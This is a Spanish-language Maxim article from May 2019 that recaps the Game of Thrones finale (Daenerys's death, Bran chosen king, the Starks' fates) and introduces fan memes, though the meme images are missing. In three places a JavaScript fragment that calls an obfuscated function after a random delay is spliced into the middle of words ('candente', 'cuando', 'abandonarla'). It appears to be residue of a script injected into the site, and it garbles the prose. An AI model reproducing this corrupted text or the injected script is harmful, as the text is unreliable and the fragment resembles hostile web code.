Game Of Thrones acabó y las redes explotaron de memes

    Game Of Thrones acabó y las redes explotaron de memes

    ¿Cuál es tu favorito?

    Autor: Redacción Maxim 20 mayo, 2019


     


    HBO

     

    Los memes del final de Game Of Thrones

     

    Por Steve Huff

     

     

    Una cosa buena acerca de Game Of Thrones: Es candom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andente, su base de fans en redes sociales tiene una creatividad poderosa, capaz de hacer los mejores memes. Especialmente cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el show la riega.

     

     

    En esta temporada  final, Game of Thrones hizo enojar a todos, por lo tanto los memes fueron geniales, sobre todo en el capítulo final.

     

     

    (Spoiler alert)

     

     

    Recapitulemos: En el final de la serie, Daenerys (Emilia Clarke) conquistó el Trono de Hierro solo para ser una Hitler de pies a cabeza (nunca debes ser un Hitler de pies a cabeza) y asustar a Tyrion Lannister (Peter Dinklage). Tyrion fue encarcelado y ahí fue donde lo visitó Jon Snow (Kit Harington).

     

    El último Lannister vivo logró convencer a Jon de que Dany había perdido la cabeza. Jon la acuchilló, amorosamente, frente al Trono de Hierro, que su último dragón, Drogon, procedió a quemar  antes de agarrar a su madre muerta y huir.

     

    Los jefes restantes de las casas se reunieron para designar un nuevo Rey, y luego de una sugerencia tonta, crean una democracia y luego de un discurso apasionado de Tyrion, eligen a Bran El Roto (Isaac Hempstead Wright). Para disgusto de muchos fanáticos, por supuesto (ver más abajo).

     

    Jon Snow fue consignado a la Guardia de la Noche, Arya Stark se fue a tierras desconocidas, y Sansa se convirtió en Reina en el Norte, eligiendo permanecer independiente del gobierno de su hermano.

     

    Todo esto y los eventos anteriores como Jaime Lannister (Nikolaj Coster-Waldau) durmiendo con Ser Brienne de Tarth (Gwendolyn Christie) antes de abandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonarla por su hermana / amante Cersei (Lena Headey), le dieron carne fresca a los fanáticos de mal humor.

     

    Echa un vistazo a algunos de los memes más divertidos que salieron de todo este lío.

     

    Como sea, a disfrutar.

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    AHORA MIRA: ALGUIEN DEJÓ UNA BOTELLA DE AGUA EN EL FINAL DE GAME OF THRONES

     

    Temas relacionados con esta nota: , , ,

¿Cuál es tu favorito?